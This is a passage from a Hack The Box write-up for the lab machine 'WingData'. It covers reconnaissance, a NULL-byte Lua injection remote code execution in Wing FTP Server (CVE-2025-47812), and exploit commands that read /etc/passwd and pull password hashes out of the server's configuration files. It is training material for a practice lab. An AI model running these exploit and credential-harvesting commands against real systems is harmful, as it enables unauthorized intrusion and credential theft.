
Hack The Box - Season 10 HTB WingData Writeup - Easy - Weekly - Feb 14th, 2026

HackTheBox - WingData

Machine: WingData Difficulty: Easy

Tools Used: Nmap, ffuf, searchsploit, hashcat, Python, sshpass


Table of Contents

  1. Reconnaissance
  2. Foothold - CVE-2025-47812: Wing FTP Lua Injection RCE
  3. Lateral Movement - Credential Extraction & Hash Cracking
  4. Privilege Escalation - CVE-2025-4517: Python tarfile PATH_MAX Bypass
  5. Attack Chain Overview

Reconnaissance

Port Scanning

Starting with a comprehensive Nmap scan to map the attack surface:

$ nmap -A -sC -sS -v -p- --min-rate=1000 <TARGET_IP> -oN nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 [REDACTED] (ECDSA)
|_  256 [REDACTED] (ED25519)
80/tcp open  http    Apache httpd 2.4.66
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: WingData Solutions
|_http-server-header: Apache/2.4.66 
Service Info: Host: localhost; OS: Linux

Only two ports are exposed: SSH on port 22 and Apache on port 80. The HTTP title reads "WingData Solutions," and the application refers to itself by the hostname wingdata.htb, so we add that name to /etc/hosts before going further.

Virtual Host Enumeration

With only two ports and a web application in play, searching for name-based virtual hosts is the logical next step. Using ffuf with a subdomain wordlist in the Host header and filtering out the default response (the catch-all page comes back with 21 words, hence -fw 21):

$ ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt \
       -u http://wingdata.htb -H "Host: FUZZ.wingdata.htb" -t 1000 -c -fw 21

ftp                     [Status: 200, Size: 678, Words: 44, Lines: 10, Duration: 574ms]

A single virtual host surfaces: ftp.wingdata.htb. After adding it to /etc/hosts and navigating to it, the response headers reveal the software immediately:

Server: Wing FTP Server(Free Edition)

The login page at /login.html confirms we are dealing with Wing FTP Server, a commercial multi-protocol file server with an embedded Lua scripting engine. This detail about the Lua engine turns out to be critical.


Foothold

CVE-2025-47812 - Wing FTP Server Unauthenticated RCE via Lua Injection

Searching ExploitDB for Wing FTP Server vulnerabilities reveals EDB-52347, a public exploit for CVE-2025-47812, which affects versions up to and including 7.4.3 (fixed in 7.4.4).

$ searchsploit -m 52347
  Exploit: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52347

Understanding the Vulnerability

The flaw stems from a discrepancy between the C-level authentication check and the Lua session logic in how they handle the username parameter:

  1. Login request: A POST is sent to /loginok.html with a username containing a NULL byte (%00) followed by injected Lua code.
  2. Authentication check: The internal C function c_CheckUser() truncates the string at the NULL byte, seeing only the legitimate username (e.g., anonymous). Since anonymous login is enabled, authentication succeeds.
  3. Session file creation: However, the session creation logic writes the full unsanitized username -- including the Lua payload -- into a session file on disk.
  4. Code execution trigger: When /dir.html is subsequently accessed with the session cookie (UID), the server parses the session file and executes the embedded Lua code, granting arbitrary command execution.

The injected Lua payload uses io.popen() to run OS commands and returns the output in the HTTP response body, ahead of the normal XML directory listing. Note that the NULL byte only hides the payload from the username check; the credentials in front of it still have to be accepted by c_CheckUser(), which is why enabled anonymous access (or any valid account) is a precondition for this attack.

Exploitation

$ python3 52347.py -u http://ftp.wingdata.htb -c 'id'

uid=1000(wingftp) gid=1000(wingftp) groups=1000(wingftp),24(cdrom),25(floppy),
29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

We have unauthenticated remote code execution as the wingftp service account. Enumerating the system users:

$ python3 52347.py -u http://ftp.wingdata.htb -c 'cat /etc/passwd | grep bash$'

root:x:0:0:root:/root:/bin/bash
wingftp:x:1000:1000:WingFTP Daemon User,,,:/opt/wingftp:/bin/bash
wacky:x:1001:1001::/home/wacky:/bin/bash

Three users have interactive shells: root, wingftp, and wacky. The user flag sits in /home/wacky/, but wingftp does not have read access to it. We need to pivot laterally to wacky.


Lateral Movement

Extracting Wing FTP Credential Hashes

Wing FTP Server stores user credentials in XML configuration files under its data directory. Using our RCE, we can read them directly:

$ python3 52347.py -u http://ftp.wingdata.htb \
    -c 'grep -ir Password /opt/wftpserver/Data/'

/opt/wftpserver/Data/_ADMINISTRATOR/admins.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/maria.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/steve.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/wacky.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/anonymous.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/users/john.xml:
    <Password>[REDACTED]</Password>

/opt/wftpserver/Data/1/settings.xml:
    <EnablePasswordSalting>1</EnablePasswordSalting>

Six password hashes are recovered: one from the administrator configuration and five from the domain user files. The settings.xml file shows that password salting is enabled, so the hashes cannot be attacked as-is. Extracting the salt value: